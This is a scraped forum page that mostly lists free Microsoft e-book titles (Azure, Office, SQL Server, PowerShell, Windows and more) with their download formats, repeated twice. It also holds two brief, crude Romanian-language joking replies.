Leaderboard

Azure Introducing Windows Azure™ for IT Professionals PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Automation PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Machine Learning PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition PDF Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure – Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure 8.5X11 PDF Azure Microsoft Azure ExpressRoute Guide PDF Azure Overview of Azure Active Directory DOC Azure Rapid Deployment Guide For Azure Rights Management PDF Azure Rethinking Enterprise Storage: A Hybrid Cloud Model PDF MOBI EPUB BizTalk BizTalk Server 2016 Licensing Datasheet PDF BizTalk BizTalk Server 2016 Management Pack Guide DOC Cloud Enterprise Cloud Strategy PDF MOBI EPUB Cloud Enterprise Cloud Strategy – Mobile PDF Developer .NET Microservices: Architecture for Containerized .NET Applications PDF Developer .NET Technology Guidance for Business Applications PDF Developer Building Cloud Apps with Microsoft Azure™: Best practices for DevOps, data storage, high availability, and more PDF MOBI EPUB Developer Containerized Docker Application Lifecycle with Microsoft Platform and Tools PDF Developer Creating Mobile Apps with Xamarin.Forms, Preview Edition 2 PDF MOBI EPUB Developer Creating Mobile Apps with Xamarin.Forms: Cross-platform C# programming for iOS, Android, and Windows PDF MOBI EPUB Developer Managing Agile Open-Source Software Projects with Microsoft Visual Studio Online PDF MOBI EPUB Developer Microsoft Azure Essentials Azure Web Apps for Developers PDF MOBI EPUB Developer Microsoft Platform and Tools for Mobile App Development PDF Developer Microsoft Platform and Tools for Mobile App Development – Mobile PDF Developer Moving to Microsoft® Visual Studio® 2010 XPS PDF MOBI EPUB Developer Programming Windows 8 Apps with HTML, CSS, and JavaScript PDF MOBI EPUB Developer Programming Windows Store Apps with HTML, CSS, and JavaScript, Second Edition PDF MOBI EPUB Developer Programming Windows® Phone 7 (Special Excerpt 2) XPS PDF Developer Team Foundation Server to Visual Studio Team Services Migration Guide PDF Dynamics 5 cool things you can do with CRM for tablets PDF Dynamics Create Custom Analytics in Dynamics 365 with Power BI PDF Dynamics Create of Customize System Dashboards PDF Dynamics Create Your First CRM Marketing Campaign PDF Dynamics CRM Basics for Outlook basics PDF Dynamics CRM Basics for Sales Pros and Service Reps PDF Dynamics Give Great Customer Service with CRM PDF Dynamics Go Mobile with CRM for Phones – Express PDF Dynamics Go Mobile with CRM for Tablets PDF Dynamics Import Contacts into CRM PDF Dynamics Introducing Microsoft Social Engagement PDF Dynamics Introduction to Business Processes PDF Dynamics Meet Your Service Goals with SLAs and Entitlements PDF Dynamics Microsoft Dynamics CRM 2016 Interactive Service Hub User Guide PDF Dynamics Microsoft Dynamics CRM 2016 On-Premises Volume Licensing and Pricing Guide PDF Dynamics Microsoft Dynamics CRM for Outlook Installing Guide for use with Microsoft Dynamics CRM Online PDF Dynamics Microsoft Dynamics CRM Resource Guide 2015 PDF Dynamics Microsoft Social Engagement for CRM PDF Dynamics Product Overview and Capability Guide Microsoft Dynamics NAV 2016 PDF Dynamics RAP as a Service for Dynamics CRM PDF Dynamics Set Up A Social Engagement Search For Your Product PDF Dynamics Social is for Closers PDF Dynamics Start Working in CRM PDF Dynamics Your Brand Sux PDF General 10 essential tips and tools for mobile working PDF General An employee’s guide to healthy computing PDF General Guide for People who have Language or Communication Disabilities DOC General Guide for People who have Learning Disabilities DOC Licensing Introduction to Per Core Licensing and Basic Definitions PDF Licensing Licensing Windows and Microsoft Office for use on the Macintosh PDF Licensing VLSC Software Assurance Guide PDF Licensing Windows Server 2016 and System Center 2016 Pricing and Licensing FAQs PDF Office Access 2013 Keyboard Shortcuts PDF Office Azure AD/Office 365 seamless sign-in PDF Office Content Encryption in Microsoft Office 365 PDF Office Controlling Access to Office 365 and Protecting Content on Devices PDF Office Customize Word 2013 Keyboard Shortcuts PDF Office Data Resiliency in Microsoft Office 365 PDF Office Excel 2013 Keyboard Shortcuts PDF Office Excel 2016 keyboard shortcuts and function keys DOC Office Excel Online Keyboard Shortcuts PDF Office File Protection Solutions in Office 365 PDF Office First Look: Microsoft® Office 2010 XPS PDF Office Get Started With Microsoft OneDrive PDF Office Get Started With Microsoft Project Online PDF Office Getting started with MyAnalytics DOC Office How To Recover That Un-Saved Office Document PDF Office InfoPath 2013 Keyboard Shortcuts PDF Office Keyboard shortcuts for Microsoft Outlook 2013 and 2016 DOC Office Keyboard shortcuts for Microsoft Word 2016 for Windows DOC Office Licensing Microsoft Office 365 ProPlus Subscription Service in Volume Licensing PDF Office Licensing Microsoft Office software in Volume Licensing PDF Office Microsoft Access 2013 Quick Start Guide PDF Office Microsoft Classroom Deployment PDF Office Microsoft Excel 2013 Quick Start Guide PDF Office Microsoft Excel 2016 for Mac Quick Start Guide PDF Office Microsoft Excel 2016 Quick Start Guide PDF Office Microsoft Excel Mobile Quick Start Guide PDF Office Microsoft Excel VLOOKUP Troubleshooting Tips PDF Office Microsoft OneNote 2013 Quick Start Guide PDF Office Microsoft OneNote 2016 for Mac Quick Start Guide PDF Office Microsoft OneNote 2016 Quick Start Guide PDF Office Microsoft OneNote 2016 Tips and Tricks PDF Office Microsoft OneNote Mobile Quick Start Guide PDF Office Microsoft Outlook 2013 Quick Start Guide PDF Office Microsoft Outlook 2016 for Mac Quick Start Guide PDF Office Microsoft Outlook 2016 Quick Start Guide PDF Office Microsoft Outlook 2016 Tips and Tricks PDF Office Microsoft Powerpoint 2013 Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint Mobile Quick Start Guide PDF Office Microsoft Project 2013 Quick Start Guide PDF Office Microsoft Publisher 2013 Quick Start Guide PDF Office Microsoft Visio 2013 Quick Start Guide PDF Office Microsoft Word 2013 Quick Start Guide PDF Office Microsoft Word 2016 for Mac Quick Start Guide PDF Office Microsoft Word 2016 Quick Start Guide PDF Office Microsoft Word Mobile Quick Start Guide PDF Office Microsoft® Office 365: Connect and Collaborate Virtually Anywhere, Anytime PDF Office Monitoring and protecting sensitive data in Office 365 DOC Office Office 365 Dedicated Platform vNext Service Release PDF Office Office 365 Licensing Brief PDF Office OneNote 2013 Keyboard Shortcuts PDF Office OneNote Online Keyboard Shortcuts PDF Office Outlook 2013 Keyboard Shortcuts PDF Office Outlook Web App Keyboard Shortcuts PDF Office Own Your Future: Update Your Skills with Resources and Career Ideas from Microsoft® XPS PDF MOBI EPUB Office PowerPoint Online Keyboard Shortcuts PDF Office Project 2013 Keyboard Shortcuts PDF Office Publisher 2013 Keyboard Shortcuts PDF Office Security and Privacy For Microsoft Office 2010 Users PDF MOBI EPUB Office Security Incident Management in Microsoft Office 365 PDF PDF Office SharePoint Online Dedicated & OneDrive for Business Dedicated vNext Service Release PDF Office Skype for Business User Tips & Tricks for Anyone PDF Office Switching from Google Apps to Office 365 for business PDF Office Tenant Isolation in Microsoft Office 365 PDF Office Visio 2013 Keyboard Shortcuts PDF Office Windows 10 Tips and Tricks PDF Office Word 2013 Keyboard Shortcuts PDF Office Word Online Keyboard Shortcuts PDF Office Working with SmartArt Graphics Keyboard Shortcuts PDF Power BI Ask, find, and act—harnessing the power of Cortana and Power BI DOC Power BI Bidirectional cross-filtering in SQL Server Analysis Services 2016 and Power BI Desktop DOC Power BI Configuring Power BI mobile apps with Microsoft Intune DOC Power BI Getting started with the Power BI for Android app DOC Power BI Getting Started with the Power BI for iOS app DOC Power BI How to plan capacity for embedded analytics with Power BI Premium PDF Power BI Introducing Microsoft Power BI PDF Power BI Introducing Microsoft Power BI – Mobile PDF Power BI Microsoft Power BI Premium Whitepaper PDF Power BI Power BI mobile apps—enabling data analytics on the go DOC Power BI Propelling digital transformation in manufacturing operations with Power BI DOC Power BI Using Power BI to visualize data insights from Microsoft Dynamics CRM Online DOC PowerShell Microsoft Dynamics GP 2015 R2 PowerShell Users Guide PDF PowerShell PowerShell Integrated Scripting Environment 3.0 PDF PowerShell Simplify Group Policy administration with Windows PowerShell PDF PowerShell Windows PowerShell 3.0 Examples PDF PowerShell Windows PowerShell 3.0 Language Quick Reference PDF PowerShell WINDOWS POWERSHELL 4.0 LANGUAGE QUICK REFERENCE PDF PowerShell Windows PowerShell 4.0 Language Reference Examples PDF PowerShell Windows PowerShell Command Builder User’s Guide PDF PowerShell Windows PowerShell Desired State Configuration Quick Reference PDF PowerShell WINDOWS POWERSHELL INTEGRATED SCRIPTING ENVIRONMENT 4.0 PDF PowerShell Windows PowerShell Web Access PDF PowerShell WMI in PowerShell 3.0 PDF PowerShell WMI in Windows PowerShell 4.0 PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities – Mobile PDF SharePoint Deployment guide for Microsoft SharePoint 2013 PDF SharePoint Microsoft SharePoint Server 2016 Architectural Models PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – 8.5 X 11 PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – Mobile PDF SharePoint RAP as a Service for SharePoint Server PDF SharePoint SharePoint Online Dedicated Service Description PDF SharePoint SharePoint Products Keyboard Shortcuts PDF SharePoint SharePoint Server 2016 Databases – Quick Reference Guide PDF SharePoint SharePoint Server 2016 Quick Start Guide PDF SQL Server 5 Tips For A Smooth SSIS Upgrade to SQL Server 2012 PDF SQL Server Backup and Restore of SQL Server Databases PDF SQL Server Data Science with Microsoft SQL Server 2016 PDF SQL Server Deeper insights across data with SQL Server 2016 – Technical White Paper PDF SQL Server Deploying SQL Server 2016 PowerPivot and Power View in a Multi-Tier SharePoint 2016 Farm DOC SQL Server Deploying SQL Server 2016 PowerPivot and Power View in SharePoint 2016 DOC SQL Server Guide to Migrating from Oracle to SQL Server 2014 and Azure SQL Database PDF SQL Server Introducing Microsoft Azure™ HDInsight™ PDF MOBI EPUB SQL Server Introducing Microsoft Data Warehouse Fast Track for SQL Server 2016 PDF SQL Server Introducing Microsoft SQL Server 2012 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2014 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 – Mobile PDF SQL Server Introducing Microsoft Technologies for Data Storage, Movement and Transformation DOC SQL Server Introducing Microsoft® SQL Server® 2008 R2 XPS PDF MOBI EPUB SQL Server Microsoft SharePoint Server 2016 Reviewer’s Guide PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Data Mining Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Multidimensional Modeling Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Reporting Services Quick Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Writing Transact-SQL-Statements PDF SQL Server Microsoft SQL Server 2014 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Licensing Datasheet PDF SQL Server Microsoft SQL Server 2016 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Mission-Critical Performance Technical White Paper PDF SQL Server Microsoft SQL Server 2016 New Innovations PDF SQL Server Microsoft SQL Server 2016 SP1 Editions PDF SQL Server Microsoft SQL Server In-Memory OLTP and Columnstore Feature Comparison PDF SQL Server RAP as a Service for SQL Server PDF SQL Server SQLCAT’s Guide to: Relational Engine PDF SQL Server Xquery Language Reference PDF Surface Surface Book User Guide PDF Surface Surface Pro 4 User Guide PDF System Center Guide to Microsoft System Center Management Pack for SQL Server 2016 Reporting Services (Native Mode) DOC System Center Guide to System Center Management Pack for Windows Print Server 2016 DOC System Center Introducing Microsoft System Center 2012 R2 PDF MOBI EPUB System Center Microsoft System Center Building a Virtualized Network Solution, Second Edition PDF MOBI EPUB System Center Microsoft System Center Data Protection for the Hybrid Cloud PDF MOBI EPUB System Center Microsoft System Center Deploying Hyper-V with Software-Defined Storage & Networking PDF MOBI EPUB System Center Microsoft System Center Extending Operations Manager Reporting PDF MOBI EPUB System Center Microsoft System Center Introduction to Microsoft Automation Solutions PDF MOBI EPUB System Center Microsoft System Center Operations Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center Software Update Management Field Experience PDF MOBI EPUB System Center Microsoft System Center: Building a Virtualized Network Solution PDF MOBI EPUB System Center Microsoft System Center: Cloud Management with App Controller PDF MOBI EPUB System Center Microsoft System Center: Configuration Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center: Designing Orchestrator Runbooks PDF MOBI EPUB System Center Microsoft System Center: Integrated Cloud Platform PDF MOBI EPUB System Center Microsoft System Center: Network Virtualization and Cloud Computing PDF MOBI EPUB System Center Microsoft System Center: Optimizing Service Manager PDF MOBI EPUB System Center Microsoft System Center: Troubleshooting Configuration Manager PDF MOBI EPUB System Center What’s new in System Center 2016 White Paper PDF Virtualization Understanding Microsoft Virtualizaton R2 Solutions XPS PDF Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager PDF MOBI EPUB Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager – Mobile PDF Windows Client Getting the most out of Microsoft Edge DOC Windows Client Introducing Windows 10 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 10 for IT Professionals, Preview Edition PDF MOBI EPUB Windows Client Introducing Windows 8.1 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 8: An Overview for IT Professionals PDF MOBI EPUB Windows Client Licensing Windows desktop operating system for use with virtual machines PDF Windows Client Protecting your data with Windows 10 BitLocker DOC Windows Client RAP as a Service for Windows Desktop PDF Windows Client Shortcut Keys for Windows 10 DOC Windows Client Use Reset to restore your Windows 10 PC DOC Windows Client Volume Licensing Reference Guide Windows 10 Desktop Operating System PDF Windows Client Windows 10 IT Pro Essentials Support Secrets PDF PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools – Mobile PDF Windows Client Work Smart: Windows 8 Shortcut Keys PDF Windows Server Automating Windows Server 2016 configuration with PowerShell and DSC DOC Windows Server Introducing Windows Server 2008 R2 XPS PDF MOBI EPUB Windows Server Introducing Windows Server 2012 PDF MOBI MOBI EPUB EPUB Windows Server Introducing Windows Server 2012 R2 PDF MOBI EPUB Windows Server Introducing Windows Server 2016 PDF Windows Server Introducing Windows Server 2016 – Mobile PDF Windows Server Introducing Windows Server 2016 Technical Preview PDF Windows Server Introducing Windows Server 2016 Technical Preview – Mobile PDF Windows Server Introducing Windows Server® 2012 R2 Preview Release PDF MOBI EPUB Windows Server Offline Assessment for Active Directory PDF Windows Server RAP as a Service for Active Directory PDF Windows Server RAP as a Service for Failover Cluster PDF Windows Server RAP as a Service for Internet Information Services PDF Windows Server RAP as a Service for Windows Server Hyper-V PDF Windows Server Windows Server 2016 Licensing PDF Sursa

Angelico, astia daca ating o femeie pe cur, nu se spala 6 luni crezand ca sunt binecuvantati apoi ies la tovarasii din cartier si le cer cate 5 lei sa-i atinga. Hahahhahaha

Pff numai dujmani pe chiatu ala

Category Title Format Azure Introducing Windows Azure™ for IT Professionals PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Automation PDF MOBI EPUB Azure Microsoft Azure Essentials Azure Machine Learning PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure PDF MOBI EPUB Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition PDF Azure Microsoft Azure Essentials Fundamentals of Azure, Second Edition Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure – Mobile PDF Azure Microsoft Azure Essentials Migrating SQL Server Databases to Azure 8.5X11 PDF Azure Microsoft Azure ExpressRoute Guide PDF Azure Overview of Azure Active Directory DOC Azure Rapid Deployment Guide For Azure Rights Management PDF Azure Rethinking Enterprise Storage: A Hybrid Cloud Model PDF MOBI EPUB BizTalk BizTalk Server 2016 Licensing Datasheet PDF BizTalk BizTalk Server 2016 Management Pack Guide DOC Cloud Enterprise Cloud Strategy PDF MOBI EPUB Cloud Enterprise Cloud Strategy – Mobile PDF Developer .NET Microservices: Architecture for Containerized .NET Applications PDF Developer .NET Technology Guidance for Business Applications PDF Developer Building Cloud Apps with Microsoft Azure™: Best practices for DevOps, data storage, high availability, and more PDF MOBI EPUB Developer Containerized Docker Application Lifecycle with Microsoft Platform and Tools PDF Developer Creating Mobile Apps with Xamarin.Forms, Preview Edition 2 PDF MOBI EPUB Developer Creating Mobile Apps with Xamarin.Forms: Cross-platform C# programming for iOS, Android, and Windows PDF MOBI EPUB Developer Managing Agile Open-Source Software Projects with Microsoft Visual Studio Online PDF MOBI EPUB Developer Microsoft Azure Essentials Azure Web Apps for Developers PDF MOBI EPUB Developer Microsoft Platform and Tools for Mobile App Development PDF Developer Microsoft Platform and Tools for Mobile App Development – Mobile PDF Developer Moving to Microsoft® Visual Studio® 2010 XPS PDF MOBI EPUB Developer Programming Windows 8 Apps with HTML, CSS, and JavaScript PDF MOBI EPUB Developer Programming Windows Store Apps with HTML, CSS, and JavaScript, Second Edition PDF MOBI EPUB Developer Programming Windows® Phone 7 (Special Excerpt 2) XPS PDF Developer Team Foundation Server to Visual Studio Team Services Migration Guide PDF Dynamics 5 cool things you can do with CRM for tablets PDF Dynamics Create Custom Analytics in Dynamics 365 with Power BI PDF Dynamics Create of Customize System Dashboards PDF Dynamics Create Your First CRM Marketing Campaign PDF Dynamics CRM Basics for Outlook basics PDF Dynamics CRM Basics for Sales Pros and Service Reps PDF Dynamics Give Great Customer Service with CRM PDF Dynamics Go Mobile with CRM for Phones – Express PDF Dynamics Go Mobile with CRM for Tablets PDF Dynamics Import Contacts into CRM PDF Dynamics Introducing Microsoft Social Engagement PDF Dynamics Introduction to Business Processes PDF Dynamics Meet Your Service Goals with SLAs and Entitlements PDF Dynamics Microsoft Dynamics CRM 2016 Interactive Service Hub User Guide PDF Dynamics Microsoft Dynamics CRM 2016 On-Premises Volume Licensing and Pricing Guide PDF Dynamics Microsoft Dynamics CRM for Outlook Installing Guide for use with Microsoft Dynamics CRM Online PDF Dynamics Microsoft Dynamics CRM Resource Guide 2015 PDF Dynamics Microsoft Social Engagement for CRM PDF Dynamics Product Overview and Capability Guide Microsoft Dynamics NAV 2016 PDF Dynamics RAP as a Service for Dynamics CRM PDF Dynamics Set Up A Social Engagement Search For Your Product PDF Dynamics Social is for Closers PDF Dynamics Start Working in CRM PDF Dynamics Your Brand Sux PDF General 10 essential tips and tools for mobile working PDF General An employee’s guide to healthy computing PDF General Guide for People who have Language or Communication Disabilities DOC General Guide for People who have Learning Disabilities DOC Licensing Introduction to Per Core Licensing and Basic Definitions PDF Licensing Licensing Windows and Microsoft Office for use on the Macintosh PDF Licensing VLSC Software Assurance Guide PDF Licensing Windows Server 2016 and System Center 2016 Pricing and Licensing FAQs PDF Office Access 2013 Keyboard Shortcuts PDF Office Azure AD/Office 365 seamless sign-in PDF Office Content Encryption in Microsoft Office 365 PDF Office Controlling Access to Office 365 and Protecting Content on Devices PDF Office Customize Word 2013 Keyboard Shortcuts PDF Office Data Resiliency in Microsoft Office 365 PDF Office Excel 2013 Keyboard Shortcuts PDF Office Excel 2016 keyboard shortcuts and function keys DOC Office Excel Online Keyboard Shortcuts PDF Office File Protection Solutions in Office 365 PDF Office First Look: Microsoft® Office 2010 XPS PDF Office Get Started With Microsoft OneDrive PDF Office Get Started With Microsoft Project Online PDF Office Getting started with MyAnalytics DOC Office How To Recover That Un-Saved Office Document PDF Office InfoPath 2013 Keyboard Shortcuts PDF Office Keyboard shortcuts for Microsoft Outlook 2013 and 2016 DOC Office Keyboard shortcuts for Microsoft Word 2016 for Windows DOC Office Licensing Microsoft Office 365 ProPlus Subscription Service in Volume Licensing PDF Office Licensing Microsoft Office software in Volume Licensing PDF Office Microsoft Access 2013 Quick Start Guide PDF Office Microsoft Classroom Deployment PDF Office Microsoft Excel 2013 Quick Start Guide PDF Office Microsoft Excel 2016 for Mac Quick Start Guide PDF Office Microsoft Excel 2016 Quick Start Guide PDF Office Microsoft Excel Mobile Quick Start Guide PDF Office Microsoft Excel VLOOKUP Troubleshooting Tips PDF Office Microsoft OneNote 2013 Quick Start Guide PDF Office Microsoft OneNote 2016 for Mac Quick Start Guide PDF Office Microsoft OneNote 2016 Quick Start Guide PDF Office Microsoft OneNote 2016 Tips and Tricks PDF Office Microsoft OneNote Mobile Quick Start Guide PDF Office Microsoft Outlook 2013 Quick Start Guide PDF Office Microsoft Outlook 2016 for Mac Quick Start Guide PDF Office Microsoft Outlook 2016 Quick Start Guide PDF Office Microsoft Outlook 2016 Tips and Tricks PDF Office Microsoft Powerpoint 2013 Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint Mobile Quick Start Guide PDF Office Microsoft Project 2013 Quick Start Guide PDF Office Microsoft Publisher 2013 Quick Start Guide PDF Office Microsoft Visio 2013 Quick Start Guide PDF Office Microsoft Word 2013 Quick Start Guide PDF Office Microsoft Word 2016 for Mac Quick Start Guide PDF Office Microsoft Word 2016 Quick Start Guide PDF Office Microsoft Word Mobile Quick Start Guide PDF Office Microsoft® Office 365: Connect and Collaborate Virtually Anywhere, Anytime PDF Office Monitoring and protecting sensitive data in Office 365 DOC Office Office 365 Dedicated Platform vNext Service Release PDF Office Office 365 Licensing Brief PDF Office OneNote 2013 Keyboard Shortcuts PDF Office OneNote Online Keyboard Shortcuts PDF Office Outlook 2013 Keyboard Shortcuts PDF Office Outlook Web App Keyboard Shortcuts PDF Office Own Your Future: Update Your Skills with Resources and Career Ideas from Microsoft® XPS PDF MOBI EPUB Office PowerPoint Online Keyboard Shortcuts PDF Office Project 2013 Keyboard Shortcuts PDF Office Publisher 2013 Keyboard Shortcuts PDF Office Security and Privacy For Microsoft Office 2010 Users PDF MOBI EPUB Office Security Incident Management in Microsoft Office 365 PDF PDF Office SharePoint Online Dedicated & OneDrive for Business Dedicated vNext Service Release PDF Office Skype for Business User Tips & Tricks for Anyone PDF Office Switching from Google Apps to Office 365 for business PDF Office Tenant Isolation in Microsoft Office 365 PDF Office Visio 2013 Keyboard Shortcuts PDF Office Windows 10 Tips and Tricks PDF Office Word 2013 Keyboard Shortcuts PDF Office Word Online Keyboard Shortcuts PDF Office Working with SmartArt Graphics Keyboard Shortcuts PDF Power BI Ask, find, and act—harnessing the power of Cortana and Power BI DOC Power BI Bidirectional cross-filtering in SQL Server Analysis Services 2016 and Power BI Desktop DOC Power BI Configuring Power BI mobile apps with Microsoft Intune DOC Power BI Getting started with the Power BI for Android app DOC Power BI Getting Started with the Power BI for iOS app DOC Power BI How to plan capacity for embedded analytics with Power BI Premium PDF Power BI Introducing Microsoft Power BI PDF Power BI Introducing Microsoft Power BI – Mobile PDF Power BI Microsoft Power BI Premium Whitepaper PDF Power BI Power BI mobile apps—enabling data analytics on the go DOC Power BI Propelling digital transformation in manufacturing operations with Power BI DOC Power BI Using Power BI to visualize data insights from Microsoft Dynamics CRM Online DOC PowerShell Microsoft Dynamics GP 2015 R2 PowerShell Users Guide PDF PowerShell PowerShell Integrated Scripting Environment 3.0 PDF PowerShell Simplify Group Policy administration with Windows PowerShell PDF PowerShell Windows PowerShell 3.0 Examples PDF PowerShell Windows PowerShell 3.0 Language Quick Reference PDF PowerShell WINDOWS POWERSHELL 4.0 LANGUAGE QUICK REFERENCE PDF PowerShell Windows PowerShell 4.0 Language Reference Examples PDF PowerShell Windows PowerShell Command Builder User’s Guide PDF PowerShell Windows PowerShell Desired State Configuration Quick Reference PDF PowerShell WINDOWS POWERSHELL INTEGRATED SCRIPTING ENVIRONMENT 4.0 PDF PowerShell Windows PowerShell Web Access PDF PowerShell WMI in PowerShell 3.0 PDF PowerShell WMI in Windows PowerShell 4.0 PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities – Mobile PDF SharePoint Deployment guide for Microsoft SharePoint 2013 PDF SharePoint Microsoft SharePoint Server 2016 Architectural Models PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – 8.5 X 11 PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – Mobile PDF SharePoint RAP as a Service for SharePoint Server PDF SharePoint SharePoint Online Dedicated Service Description PDF SharePoint SharePoint Products Keyboard Shortcuts PDF SharePoint SharePoint Server 2016 Databases – Quick Reference Guide PDF SharePoint SharePoint Server 2016 Quick Start Guide PDF SQL Server 5 Tips For A Smooth SSIS Upgrade to SQL Server 2012 PDF SQL Server Backup and Restore of SQL Server Databases PDF SQL Server Data Science with Microsoft SQL Server 2016 PDF SQL Server Deeper insights across data with SQL Server 2016 – Technical White Paper PDF SQL Server Deploying SQL Server 2016 PowerPivot and Power View in a Multi-Tier SharePoint 2016 Farm DOC SQL Server Deploying SQL Server 2016 PowerPivot and Power View in SharePoint 2016 DOC SQL Server Guide to Migrating from Oracle to SQL Server 2014 and Azure SQL Database PDF SQL Server Introducing Microsoft Azure™ HDInsight™ PDF MOBI EPUB SQL Server Introducing Microsoft Data Warehouse Fast Track for SQL Server 2016 PDF SQL Server Introducing Microsoft SQL Server 2012 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2014 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 – Mobile PDF SQL Server Introducing Microsoft Technologies for Data Storage, Movement and Transformation DOC SQL Server Introducing Microsoft® SQL Server® 2008 R2 XPS PDF MOBI EPUB SQL Server Microsoft SharePoint Server 2016 Reviewer’s Guide PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Data Mining Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Multidimensional Modeling Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Reporting Services Quick Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Writing Transact-SQL-Statements PDF SQL Server Microsoft SQL Server 2014 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Licensing Datasheet PDF SQL Server Microsoft SQL Server 2016 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Mission-Critical Performance Technical White Paper PDF SQL Server Microsoft SQL Server 2016 New Innovations PDF SQL Server Microsoft SQL Server 2016 SP1 Editions PDF SQL Server Microsoft SQL Server In-Memory OLTP and Columnstore Feature Comparison PDF SQL Server RAP as a Service for SQL Server PDF SQL Server SQLCAT’s Guide to: Relational Engine PDF SQL Server Xquery Language Reference PDF Surface Surface Book User Guide PDF Surface Surface Pro 4 User Guide PDF System Center Guide to Microsoft System Center Management Pack for SQL Server 2016 Reporting Services (Native Mode) DOC System Center Guide to System Center Management Pack for Windows Print Server 2016 DOC System Center Introducing Microsoft System Center 2012 R2 PDF MOBI EPUB System Center Microsoft System Center Building a Virtualized Network Solution, Second Edition PDF MOBI EPUB System Center Microsoft System Center Data Protection for the Hybrid Cloud PDF MOBI EPUB System Center Microsoft System Center Deploying Hyper-V with Software-Defined Storage & Networking PDF MOBI EPUB System Center Microsoft System Center Extending Operations Manager Reporting PDF MOBI EPUB System Center Microsoft System Center Introduction to Microsoft Automation Solutions PDF MOBI EPUB System Center Microsoft System Center Operations Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center Software Update Management Field Experience PDF MOBI EPUB System Center Microsoft System Center: Building a Virtualized Network Solution PDF MOBI EPUB System Center Microsoft System Center: Cloud Management with App Controller PDF MOBI EPUB System Center Microsoft System Center: Configuration Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center: Designing Orchestrator Runbooks PDF MOBI EPUB System Center Microsoft System Center: Integrated Cloud Platform PDF MOBI EPUB System Center Microsoft System Center: Network Virtualization and Cloud Computing PDF MOBI EPUB System Center Microsoft System Center: Optimizing Service Manager PDF MOBI EPUB System Center Microsoft System Center: Troubleshooting Configuration Manager PDF MOBI EPUB System Center What’s new in System Center 2016 White Paper PDF Virtualization Understanding Microsoft Virtualizaton R2 Solutions XPS PDF Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager PDF MOBI EPUB Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager – Mobile PDF Windows Client Getting the most out of Microsoft Edge DOC Windows Client Introducing Windows 10 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 10 for IT Professionals, Preview Edition PDF MOBI EPUB Windows Client Introducing Windows 8.1 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 8: An Overview for IT Professionals PDF MOBI EPUB Windows Client Licensing Windows desktop operating system for use with virtual machines PDF Windows Client Protecting your data with Windows 10 BitLocker DOC Windows Client RAP as a Service for Windows Desktop PDF Windows Client Shortcut Keys for Windows 10 DOC Windows Client Use Reset to restore your Windows 10 PC DOC Windows Client Volume Licensing Reference Guide Windows 10 Desktop Operating System PDF Windows Client Windows 10 IT Pro Essentials Support Secrets PDF PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools – Mobile PDF Windows Client Work Smart: Windows 8 Shortcut Keys PDF Windows Server Automating Windows Server 2016 configuration with PowerShell and DSC DOC Windows Server Introducing Windows Server 2008 R2 XPS PDF MOBI EPUB Windows Server Introducing Windows Server 2012 